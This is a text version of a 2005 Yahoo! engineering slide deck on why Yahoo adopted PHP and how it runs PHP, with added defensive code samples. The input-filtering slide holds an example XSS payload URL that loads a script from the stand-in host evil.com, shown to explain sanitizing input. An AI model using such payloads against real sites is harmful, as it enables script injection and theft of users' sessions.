PHP at Yahoo!
    http://public.yahoo.com/~radwin/



          Michael J. Radwin
            October 20, 2005

1
Outline

    • Yahoo!, as seen by an engineer
    • Choosing PHP in 2002
    • PHP architecture at Yahoo!




2
The Internet’s most trafficked site




3
25 countries, 13 languages




4
Yahoo! by the Numbers

    • 411M unique visitors per month
    • 191M active registered users
    • 11.4M fee-paying customers
    • 3.4B average daily pageviews




    October 2005

5
6
Engineering Values

    1.       Security & Privacy
         –      We must protect our customers’ information
    2.       High Availability
         –      If the site is offline, we’re missing the opportunity
                to serve our customers
    3.       Performance
         –      We serve billions of pageviews a day
    4.       Flexibility & Innovation
         –      Customize site for each market
         –      Rapid development of new features

7
From Proprietary to Open Source

     [Timeline, 1994 to 2005. Web Server: “Filo Server”, Apache.
      DB: Flat Files. Web Lang: yScript.]


8
Choosing a Language
How and Why We Selected PHP




9
Choosing PHP: brief history

     • October 2001: 3 proprietary languages
       – Costly to continue to maintain each
       – Limited features (no subroutines!)
     • Committee began researching
       – Compare features, performance
       – Build vs. Buy vs. Open Source
     • PHP selected May 2002
10
Ideal Language Criteria

     1. High performance
     2. Robust, sand-boxed
     3. Language features
       •   Loops, conditionals
       •   Complex data-types
     4. C/C++ extensions
     5. Runs on FreeBSD
     8. Interpreted or dynamically compiled
     9. i18n support
     10. Clean separation of presentation/content/app semantics
     11. Low training costs
     12. Doesn’t require CS degree to use


11
Top 10 Language Choices



     [Figure: candidate languages. Legible labels: yScript, mod_include, XSLT]

12
Performance: Requests

     [Chart: Requests/sec (req/s, 0 to 350) vs. concurrent requests (25 to 500).
      Series: PHP, YSP, mod_perl, HF2k, yScript, Network max]


13
Performance: Memory

     [Chart: Active Virtual Memory (kbytes active, 0 to 1000000) vs. concurrent
      requests (25 to 500). Series: PHP, YSP, mod_perl, HF2k, yScript]


14
Why we picked PHP

     1.       Designed for web scripting
     2.       High performance
     3.       Large, Open Source community
          •     Documentation, easy to hire developers
     4.       “Code-in-HTML” paradigm
                <html>
                <?php echo "Hello World"; ?>
                </html>

     5.       Integration, libraries, extensibility
     6.       Tools: IDE, debugger, profiler

15
PHP at Yahoo! Today




16
Yahoo!’s Development Methodology

     • Server Architecture
     • File Layout
     • Dependency Management
     • Security
     • Performance
     • Globalization

17
Server Architecture

     [Diagram: Load Balancer; Web Servers (Apache, Scripts); Web Services;
      User Profile Server; Ad Server]



18
File Layout


     Layer              Location / contents               HTML    PHP
     HTML Templates     /usr/local/share/htdocs/*.php     95%     5%
     Template Helpers   /usr/local/share/htdocs/*.inc     50%     50%
     Business Logic     /usr/local/share/pear/*.inc       0%      100%
     C/C++ Core Code    Data access, Networking, Crypto   0%      0%
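
The layering above can be sketched in a single file. This is only an illustration, assuming hypothetical function names (get_headlines, render_list, render_page) and hard-coded data. In the layout the slide describes, each part would live in its own file under the listed directory.

```php
<?php
// Business logic (pear/*.inc on the slide): 100% PHP, no HTML.
// get_headlines() is a hypothetical function with hard-coded sample data.
function get_headlines(): array
{
    return ['PHP selected', 'Unicode & ICU'];
}

// Template helper (htdocs/*.inc on the slide): a mix of PHP and HTML.
function render_list(array $items): string
{
    $html = "<ul>\n";
    foreach ($items as $item) {
        // Escape each item so data cannot inject markup into the page.
        $html .= '  <li>' . htmlspecialchars($item, ENT_QUOTES, 'UTF-8') . "</li>\n";
    }
    return $html . "</ul>\n";
}

// HTML template (htdocs/*.php on the slide): mostly HTML, a little PHP.
// Output buffering is used here only so the page can be returned as a string.
function render_page(): string
{
    ob_start();
    ?>
<html>
<body>
<?php echo render_list(get_headlines()); ?>
</body>
</html>
<?php
    return ob_get_clean();
}

echo render_page();
```

Keeping markup out of the business-logic layer means the same function can feed a different template per market without changes.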




19
Dependency Management

               •   Base PHP package depends only on XML parser
                   ./configure --disable-all
               •   Self-Contained Extensions
                   –   mysql, dba, curl, ldap, pcre, gd, iconv
                   –   To enable
                       1. Install /usr/local/lib/php/20020429/mysql.so
                       2. Add “extension = mysql.so” to php.ini
                   –   Avoids unnecessary dependencies
                   –   Smaller Apache memory footprint
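
One way to confirm which of these extensions a given server actually loads is to ask PHP at runtime. The sketch below assumes a hypothetical helper named report_extensions; extension_loaded() is a standard PHP function. The result depends entirely on the local php.ini, so no particular output is implied.

```php
<?php
// Extension names taken from the slide. Note that the mysql extension
// was removed in PHP 7, so it reports "not loaded" on current versions.
$wanted = ['mysql', 'dba', 'curl', 'ldap', 'pcre', 'gd', 'iconv'];

// report_extensions() is a hypothetical helper, not part of PHP.
// It maps each extension name to true (loaded) or false (not loaded).
function report_extensions(array $names): array
{
    $status = [];
    foreach ($names as $name) {
        $status[$name] = extension_loaded($name);
    }
    return $status;
}

foreach (report_extensions($wanted) as $name => $loaded) {
    echo str_pad($name, 8), $loaded ? 'loaded' : 'not loaded', "\n";
}
```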


20
Security: INI Settings

     • open_basedir
       – Insurance against /etc/passwd exploits
     • allow_url_fopen = Off
       – Use libcurl extension instead
       – Avoid open proxy exploits
     • display_errors = Off
       – However, log_errors = On
     • safe_mode = Off
       – Intended for shared hosting environment
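
The settings above can be checked from a script. This is a minimal sketch, assuming a hypothetical helper named audit_ini; ini_get() is the standard PHP call. The expected values are copied from the slide, and safe_mode no longer exists in current PHP versions, where ini_get() returns false for it.

```php
<?php
// audit_ini() is a hypothetical helper, not part of PHP. It returns the
// directives whose current on/off state differs from the expected one.
function audit_ini(array $expected): array
{
    $mismatches = [];
    foreach ($expected as $name => $want) {
        $raw = ini_get($name); // false when the directive is unknown
        // Treat "", "0", "off", "no" and "false" as Off; anything else as On.
        $have = !in_array(strtolower((string) $raw), ['', '0', 'off', 'no', 'false'], true);
        if ($have !== $want) {
            $mismatches[$name] = $raw;
        }
    }
    return $mismatches;
}

// true means On, false means Off, as recommended on the slide.
$expected = [
    'allow_url_fopen' => false,
    'display_errors'  => false,
    'log_errors'      => true,
    'safe_mode'       => false,
];

foreach (audit_ini($expected) as $name => $raw) {
    echo "$name is ", var_export($raw, true), ', slide recommends ',
        ($expected[$name] ? 'On' : 'Off'), "\n";
}

// open_basedir takes a path list rather than On/Off, so it is only reported.
echo 'open_basedir: ', ini_get('open_basedir') ?: '(not set)', "\n";
```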


21
Security: Input Filtering

     http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js>

     • Cross Site Scripting (XSS) most common attack
        – Also “SQL Injection”
     • Normal approach
        – strip_tags()
        – mysqli_escape_string()
        – Examine every line of code
        – Tedious and error-prone
     • Use input_filter hook
        – Sanitize all user-submitted data
        – GET/POST/Cookie
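
The idea of sanitizing every request value in one place can be approximated in userland. The sketch below is not the input_filter hook itself, which runs inside PHP before scripts see the data. It assumes a hypothetical function named sanitize_input and covers only the XSS case, not SQL injection.

```php
<?php
// sanitize_input() is a hypothetical userland helper. It escapes HTML
// metacharacters in a value, recursing into arrays such as $_GET or $_POST.
function sanitize_input($value)
{
    if (is_array($value)) {
        return array_map('sanitize_input', $value);
    }
    // Escaped markup is displayed as text instead of being executed.
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// The query parameter from the slide's example URL, after URL decoding.
$get = ['p' => '<script src=http://evil.com/x.js>'];

$clean = sanitize_input($get);
echo $clean['p'], "\n"; // prints &lt;script src=http://evil.com/x.js&gt;
```

Applying one function to GET, POST, and cookie data at the entry point avoids having to audit every line that echoes user input.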
22
Performance: Opcode Caches

     • Easiest performance boost
       – Cache parsed .php scripts in shared memory
       – Optimizations
       – No code modifications!
     • Several products available
       – Zend Performance Suite
       – APC
       – Turck MMCache
23
Performance: PHP Extensions in C++

     • PHP ships with 80 extensions written in C/C++
     • Yahoo! develops its own proprietary extensions
        – Fast execution speed
        – Access to client libraries
     • Longer development cycle
        – Edit, compile, link, debug
        – Manual memory management
24
Globalization: PHP Unicode

     [Image] + [Image] + ICU = 6

     • Native Unicode support in 2006
     • Collaborative effort
       – Andrei Zmievski (Yahoo!)
       – Andi Gutmans (Zend)
       – Many members of PHP Community

25
26
